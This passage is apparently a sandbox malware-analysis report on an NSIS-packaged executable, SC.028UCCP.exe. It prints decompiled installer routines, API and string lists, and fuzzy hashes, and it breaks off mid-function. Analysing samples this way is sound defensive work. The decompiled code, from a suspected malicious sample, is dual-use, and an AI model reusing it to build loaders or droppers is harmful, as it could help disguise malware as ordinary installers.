				_t76 =  *0x42ebb0; // 0x651b28
				_t17 = E00405EC3(6);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a020;
					"1033" = 0x30;
					 *0x435001 = 0x78;
					 *0x435002 = 0;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a020, 0);
					__eflags =  *0x42a020;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040730E, 0x42a020, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405AF6("1033", _t67 & 0x0000ffff);
				}
				E00403908(_t71, _t84);
				_t21 =  *0x42ebb8; // 0x0
				_t81 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter";
				 *0x42ec20 = _t21 & 0x00000020;
				 *0x42ec3c = 0x10000;
				if(E00405733(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") != 0) {
					L16:
					if(E00405733(_t92, _t81) == 0) {
						E00405BBA(0, _t74, _t76, _t81,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42eba0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e388 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403908(_t71, __eflags);
							__eflags =  *0x42ec40; // 0x0
							if(__eflags != 0) {
								_t28 = E00404F77(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e36c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a000, 5); // executed
							_t34 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t82 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t82, 0x42e340);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e340);
								 *0x42e364 = _t82;
								RegisterClassA(0x42e340);
							}
							_t36 =  *0x42e380; // 0x0
							_t39 = DialogBoxParamA( *0x42eba0, _t36 + 0x00000069 & 0x0000ffff, 0, E004039D5, 0); // executed
							E00403593(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42eba0; // 0x400000
						 *0x42e344 = E00401000;
						 *0x42e350 = _t71;
						 *0x42e354 = _t25;
						 *0x42e364 = 0x4091ec;
						if(RegisterClassA(0x42e340) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a000 = CreateWindowExA(0x80, 0x4091ec, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eba0, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t55 =  *0x42ebd8; // 0x653308
					_t74 = 0x42db40;
					E00405A7F( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) + _t55, 0x42db40, 0);
					_t57 =  *0x42db40; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42db41;
						 *((char*)(E00405670(0x42db41, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405B98(_t81, E00405645(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E0040568C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403649
0x00403652
0x00403659
0x0040365b
0x0040366f
0x00403681
0x00403688
0x0040368f
0x00403695
0x0040369a
0x004036a0
0x004036b3
0x004036b3
0x004036be
0x0040365d
0x0040365d
0x00403668
0x00403668
0x004036c3
0x004036c8
0x004036cd
0x004036d6
0x004036db
0x004036ec
0x00403773
0x0040377b
0x00403784
0x00403784
0x0040379a
0x004037a0
0x004037ae
0x0040382f
0x00403837
0x00403841
0x00403846
0x0040384c
0x004038d6
0x004038db
0x004038dd
0x004038f9
0x00000000
0x004038f9
0x004038df
0x004038e5
0x004038ed
0x004038ed
0x00000000
0x004038e5
0x0040385a
0x0040386b
0x0040386d
0x0040386f
0x00403876
0x00403876
0x0040387e
0x00403886
0x00403888
0x0040388a
0x00403893
0x00403896
0x0040389c
0x0040389c
0x004038a2
0x004038bb
0x004038cc
0x00000000
0x004038d1
0x00403839
0x0040383b
0x00000000
0x004037b0
0x004037b0
0x004037bc
0x004037c6
0x004037cc
0x004037d1
0x004037e0
0x004038fe
0x004038fe
0x00000000
0x004038fe
0x004037ef
0x0040382a
0x00000000
0x0040382a
0x004036f2
0x004036f2
0x004036f7
0x00000000
0x00000000
0x004036fc
0x00403701
0x00403711
0x00403716
0x0040371d
0x00000000
0x00000000
0x00403721
0x00403723
0x00403730
0x00403730
0x00403738
0x0040373e
0x00403766
0x0040376e
0x00000000
0x00403750
0x00403751
0x0040375a
0x00403760
0x00403761
0x00000000
0x00403761
0x0040375c
0x0040375e
0x00000000
0x00000000
0x00000000
0x0040375e
0x0040373e

APIs

Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1

GetUserDefaultUILanguage.KERNELBASE(00000006,C:\Users\user\AppData\Local\Temp\,75DD3410,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040365D

Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03

lstrcatA.KERNEL32(1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75DD3410,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 004036BE
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter,1033,0042A020,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A020,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403733
lstrcmpiA.KERNEL32(?,.exe), ref: 00403746
GetFileAttributesA.KERNEL32(Call), ref: 00403751
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter), ref: 0040379A
RegisterClassA.USER32(0042E340), ref: 004037D7
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037EF
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403824
ShowWindow.USER32(00000005,00000000), ref: 0040385A
LoadLibraryA.KERNELBASE(RichEd20), ref: 0040386B
LoadLibraryA.KERNEL32(RichEd32), ref: 00403876
GetClassInfoA.USER32(00000000,RichEdit20A,0042E340), ref: 00403886
GetClassInfoA.USER32(00000000,RichEdit,0042E340), ref: 00403893
RegisterClassA.USER32(0042E340), ref: 0040389C
DialogBoxParamA.USER32(?,00000000,004039D5,00000000), ref: 004038BB

Strings

.exe, xrefs: 00403740
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter, xrefs: 004036CD, 004036D5, 0040376D, 00403773, 00403783
RichEdit20A, xrefs: 0040387E, 00403884
RichEd32, xrefs: 00403871
Control Panel\Desktop\ResourceLocale, xrefs: 00403677
_Nb, xrefs: 004037B6, 0040381E
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00403647
RichEd20, xrefs: 00403866
RichEdit, xrefs: 0040388D
Call, xrefs: 00403701, 00403709, 00403716, 00403760, 00403766
.DEFAULT\Control Panel\International, xrefs: 004036A9
C:\Users\user\AppData\Local\Temp\, xrefs: 0040364F
1033, xrefs: 00403663, 004036B9

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 2262724009-2347045456
Opcode ID: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
Instruction ID: d6b8b8f74f5c97fe18c953e6bf65f24cda553212ccbeeb7194f723ec3a9c37cf
Opcode Fuzzy Hash: c7bd37f06fa2d2c1041450b4cee417967b75f190bdbf37bb4b464d911afaa79b
Instruction Fuzzy Hash: EE61D570A442006EE720AF669C45F273EACE74475AF40457EF901B32E1C77DAD028A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C33 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402C33(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Arthur\\Desktop\\SC.028UCCP.exe";
				 *0x42ebac = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\SC.028UCCP.exe", 0x400);
				_t89 = E00405846(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Arthur\\Desktop";
				E00405B98("C:\\Users\\Arthur\\Desktop", _t91);
				E00405B98(0x436000, E0040568C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428bd8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BCF(1);
					__eflags =  *0x42ebb4 - _t82; // 0x8c00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ebb4; // 0x8c00
						E004030C0(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E6C();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ebb0 = _t94;
							 *0x42ebb8 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ebbc =  *0x42ebbc + 1;
								__eflags =  *0x42ebbc;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405801(0x42ebc0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030C0( *0x414bc8);
					_t65 = E0040308E( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ebb4; // 0x8c00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040308E(0x420bd8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BCF(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ebb4;
						if( *0x42ebb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BCF(0);
							}
							goto L20;
						}
						E00405801( &_v44, 0x420bd8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414bc8; // 0x3fc1c
						 *0x42ec40 =  *0x42ec40 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ebb4 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40918c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428bd8; // 0x41480
						if(__eflags < 0) {
							_v12 = E00405F35(_v12, 0x420bd8, _t90);
						}
						 *0x414bc8 =  *0x414bc8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c3b
0x00402c3e
0x00402c41
0x00402c44
0x00402c4a
0x00402c5b
0x00402c60
0x00402c73
0x00402c78
0x00402c7b
0x00402c81
0x00000000
0x00402c83
0x00402c8e
0x00402c94
0x00402ca5
0x00402cac
0x00402cb2
0x00402cb4
0x00402cb9
0x00402cbb
0x00402da8
0x00402daa
0x00402daf
0x00402db6
0x00000000
0x00000000
0x00402db8
0x00402dbb
0x00402ddf
0x00402de4
0x00402dea
0x00402dec
0x00402df5
0x00402dfa
0x00402dfd
0x00402dfe
0x00402dff
0x00402e01
0x00402e06
0x00402e09
0x00402e1c
0x00402e20
0x00402e28
0x00402e2d
0x00402e2f
0x00402e2f
0x00402e2f
0x00402e37
0x00402e37
0x00402e3a
0x00402e3b
0x00402e3b
0x00402e3e
0x00402e40
0x00402e40
0x00402e40
0x00402e4a
0x00402e50
0x00402e5e
0x00402e63
0x00000000
0x00402e63
0x00000000
0x00402e09
0x00402dc3
0x00402dce
0x00402dd3
0x00402dd5
0x00000000
0x00000000
0x00402dda
0x00402ddd
0x00000000
0x00000000
0x00000000
0x00402cc1
0x00402cc6
0x00402cc6
0x00402ccb
0x00402ccf
0x00402cd6
0x00402cdb
0x00402cdd
0x00402cdf
0x00402cdf
0x00402ce3
0x00402ce8
0x00402cea
0x00402e14
0x00402e0b
0x00000000
0x00402e0b
0x00402cf0
0x00402cf7
0x00402d73
0x00402d77
0x00402d7b
0x00402d80
0x00000000
0x00402d77
0x00402d00
0x00402d05
0x00402d08
0x00402d0d
0x00000000
0x00000000
0x00402d0f
0x00402d16
0x00000000
0x00000000
0x00402d18
0x00402d1f
0x00000000
0x00000000
0x00402d21
0x00402d28
0x00000000
0x00000000
0x00402d2a
0x00402d31
0x00000000
0x00000000
0x00402d33
0x00402d39
0x00402d42
0x00402d48
0x00402d4b
0x00402d4d
0x00402d53
0x00000000
0x00000000
0x00402d59
0x00402d5d
0x00402d65
0x00402d65
0x00402d68
0x00402d68
0x00402d6b
0x00402d6d
0x00402d6f
0x00402d6f
0x00000000
0x00402d6d
0x00402d5f
0x00402d63
0x00000000
0x00000000
0x00000000
0x00402d81
0x00402d81
0x00402d87
0x00402d93
0x00402d93
0x00402d96
0x00402d9c
0x00402d9e
0x00402d9e
0x00402da6
0x00402da6
0x00000000
0x00402da6

APIs

GetTickCount.KERNEL32 ref: 00402C44
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SC.028UCCP.exe,00000400), ref: 00402C60

Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00402CAC

Strings

Error launching installer, xrefs: 00402C83
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
Inst, xrefs: 00402D18
C:\Users\user\Desktop\SC.028UCCP.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
soft, xrefs: 00402D21
Null, xrefs: 00402D2A
C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00402C33
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-3956266661
Opcode ID: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
Instruction ID: 8bc35dde1f4d805c720579c209d35afe3860aa9343481584d03e725a70eefc79
Opcode Fuzzy Hash: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
Instruction Fuzzy Hash: 5A51E571900204ABDB209F65DE89B9E7BA8EB04355F10403FFD05B22D1D7BCAE418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 10001A86 Relevance: 18.5, APIs: 12, Instructions: 510
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10001A86() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				CHAR* _t184;
				signed int _t186;
				signed int _t187;
				void* _t190;
				void* _t192;
				CHAR* _t194;
				void* _t202;
				struct HINSTANCE__* _t203;
				signed int _t204;
				signed int _t206;
				struct HINSTANCE__* _t207;
				signed int _t209;
				void* _t210;
				void* _t222;
				signed char _t223;
				void* _t228;
				signed int _t230;
				void* _t231;
				void* _t232;
				void* _t236;
				void* _t239;
				signed int _t241;
				void* _t248;
				void* _t249;
				void* _t252;
				signed int _t257;
				signed char _t260;
				void _t261;
				void* _t262;
				void* _t273;
				void* _t274;
				void* _t278;
				void* _t279;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed char _t289;
				signed int _t290;
				CHAR* _t291;
				CHAR* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				void* _t297;
				void* _t298;

				_t257 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v12 = 0;
				_v40 = 0;
				_t298 = 0;
				_v48 = 0;
				_t184 = E10001215();
				_v24 = _t184;
				_v28 = _t184;
				_v44 = E10001215();
				_t186 = E1000123B();
				_v56 = _t186;
				_v8 = _t186;
				while(1) {
					_t187 = _v32;
					_t290 = 3;
					_v52 = _t187;
					if(_t187 != _t257 && _t298 == _t257) {
						break;
					}
					_t289 =  *_v8;
					_t260 = _t289;
					_t190 = _t260 - _t257;
					if(_t190 == 0) {
						_v32 = _v32 | 0xffffffff;
						L13:
						_t192 = _v52 - _t257;
						if(_t192 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							if(_t298 == _t257) {
								_t228 = GlobalAlloc(0x40, 0x14a4); // executed
								_t298 = _t228;
								 *(_t298 + 0x810) = _t257;
								 *(_t298 + 0x814) = _t257;
							}
							_t261 = _v36;
							_t40 = _t298 + 8; // 0x8
							_t194 = _t40;
							_t41 = _t298 + 0x408; // 0x408
							_t291 = _t41;
							 *_t298 = _t261;
							 *_t194 =  *_t194 & 0x00000000;
							 *(_t298 + 0x808) = _t257;
							 *_t291 =  *_t291 & 0x00000000;
							_t262 = _t261 - _t257;
							 *(_t298 + 0x80c) = _t257;
							 *(_t298 + 4) = _t257;
							if(_t262 == 0) {
								if(_v28 == _v24) {
									goto L56;
								}
								_t297 = 0;
								GlobalFree(_t298);
								_t298 = E1000131B(_v24);
								if(_t298 == _t257) {
									goto L56;
								} else {
									goto L28;
								}
								while(1) {
									L28:
									_t222 =  *(_t298 + 0x14a0);
									if(_t222 == _t257) {
										break;
									}
									_t297 = _t298;
									_t298 = _t222;
									if(_t298 != _t257) {
										continue;
									}
									break;
								}
								if(_t297 != _t257) {
									 *(_t297 + 0x14a0) = _t257;
								}
								_t223 =  *(_t298 + 0x810);
								if((_t223 & 0x00000008) == 0) {
									 *(_t298 + 0x810) = _t223 | 0x00000002;
								} else {
									_t298 = E10001551(_t298);
									 *(_t298 + 0x810) =  *(_t298 + 0x810) & 0xfffffff5;
								}
								goto L56;
							} else {
								_t273 = _t262 - 1;
								if(_t273 == 0) {
									L24:
									lstrcpyA(_t194, _v44);
									L25:
									lstrcpyA(_t291, _v24);
									L56:
									_v28 = _v24;
									L57:
									_v8 = _v8 + 1;
									if(_v32 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t274 = _t273 - 1;
								if(_t274 == 0) {
									goto L25;
								}
								if(_t274 != 1) {
									goto L56;
								}
								goto L24;
							}
						}
						if(_t192 == 1) {
							_t230 = _v16;
							if(_v40 == _t257) {
								_t230 = _t230 - 1;
							}
							 *(_t298 + 0x814) = _t230;
						}
						goto L56;
					}
					_t231 = _t190 - 0x23;
					if(_t231 == 0) {
						_v32 = _t257;
						_v36 = _t257;
						goto L13;
					}
					_t232 = _t231 - 5;
					if(_t232 == 0) {
						_v32 = 1;
						_v12 = _t257;
						_v20 = _t257;
						_v16 = (0 | _v36 == _t290) + 1;
						_v40 = _t257;
						goto L13;
					}
					_t236 = _t232 - 1;
					if(_t236 == 0) {
						_v32 = 2;
						_v12 = _t257;
						_v20 = _t257;
						goto L13;
					}
					if(_t236 != 0x16) {
						_t239 = _v32 - _t257;
						if(_t239 == 0) {
							if(_t289 == 0x2a) {
								_v36 = 2;
								L55:
								_t257 = 0;
								goto L56;
							}
							if(_t289 == 0x2d) {
								L125:
								_t241 = _v8 + 1;
								if( *_t241 != 0x3e) {
									L127:
									_t241 = _v8 + 1;
									if( *_t241 != 0x3a || _t289 == 0x2d) {
										L134:
										_v28 =  &(_v28[1]);
										 *_v28 = _t289;
										goto L57;
									} else {
										_v36 = 1;
										L130:
										_v8 = _t241;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L55;
									}
								}
								_v36 = _t290;
								goto L130;
							}
							if(_t289 != 0x3a) {
								goto L134;
							}
							if(_t289 != 0x2d) {
								goto L127;
							}
							goto L125;
						}
						_t248 = _t239 - 1;
						if(_t248 == 0) {
							L68:
							_t249 = _t260 - 0x22;
							if(_t249 > 0x55) {
								goto L55;
							}
							switch( *((intOrPtr*)(( *(_t249 + 0x1000210f) & 0x000000ff) * 4 +  &M100020AF))) {
								case 0:
									__eax = _v24;
									__edi = _v8;
									while(1) {
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										if(__cl == __dl &&  *(__edi + 1) != __dl) {
											break;
										}
										if(__cl == 0) {
											break;
										}
										if(__cl == __dl) {
											__edi = __edi + 1;
										}
										__cl =  *__edi;
										 *__eax =  *__edi;
										__eax = __eax + 1;
									}
									 *__eax =  *__eax & 0x00000000;
									__ebx = E10001224(_v24);
									goto L84;
								case 1:
									_v12 = 1;
									goto L55;
								case 2:
									_v12 = _v12 | 0xffffffff;
									goto L55;
								case 3:
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v16 = _v16 + 1;
									goto L73;
								case 4:
									if(_v20 != 0) {
										goto L55;
									}
									_v8 = _v8 - 1;
									__ebx = E10001215();
									 &_v8 = E10001A24( &_v8);
									__eax = E10001446(__edx, __eax, __edx, __ebx);
									goto L84;
								case 5:
									L92:
									_v20 = _v20 + 1;
									goto L55;
								case 6:
									_push(0x19);
									goto L120;
								case 7:
									_push(0x15);
									goto L120;
								case 8:
									_push(0x16);
									goto L120;
								case 9:
									_push(0x18);
									goto L120;
								case 0xa:
									_push(5);
									goto L100;
								case 0xb:
									__eax = 0;
									__eax = 1;
									goto L78;
								case 0xc:
									_push(6);
									goto L100;
								case 0xd:
									_push(2);
									goto L100;
								case 0xe:
									_push(3);
									goto L100;
								case 0xf:
									_push(0x17);
									L120:
									_pop(__ebx);
									goto L85;
								case 0x10:
									__eax =  &_v8;
									__eax = E10001A24( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									if(__ebx < 0xb) {
										__ebx = __ebx + 0xa;
									}
									goto L84;
								case 0x11:
									__ebx = 0xffffffff;
									goto L85;
								case 0x12:
									_v48 = _v48 + 1;
									_push(3);
									_pop(__eax);
									goto L78;
								case 0x13:
									__eax = 0;
									goto L78;
								case 0x14:
									_push(4);
									L100:
									_pop(__eax);
									L78:
									__edi = _v16;
									__ecx =  *((intOrPtr*)(0x10003058 + __eax * 4));
									__edi = _v16 << 5;
									__edx = 0;
									__edi = (_v16 << 5) + __esi;
									__edx = 1;
									_v40 = 1;
									 *(__edi + 0x818) = __eax;
									if(_v12 == 0xffffffff || __ecx <= 0) {
										__ecx = __edx;
									}
									 *((intOrPtr*)(__edi + 0x828)) = __ecx;
									if(_v12 == __edx) {
										__eax =  &_v8;
										__eax = E10001A24( &_v8);
										_v12 = __eax;
									}
									__eax = _v12;
									 *((intOrPtr*)(__edi + 0x81c)) = _v12;
									_t126 = _v16 + 0x41; // 0x41
									_t126 = _t126 << 5;
									__eax = 0;
									 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
									 *((intOrPtr*)(__edi + 0x82c)) = 0;
									 *((intOrPtr*)(__edi + 0x830)) = 0;
									goto L84;
								case 0x15:
									_t251 =  *(_t298 + 0x814);
									if(_t251 > _v16) {
										_v16 = _t251;
									}
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
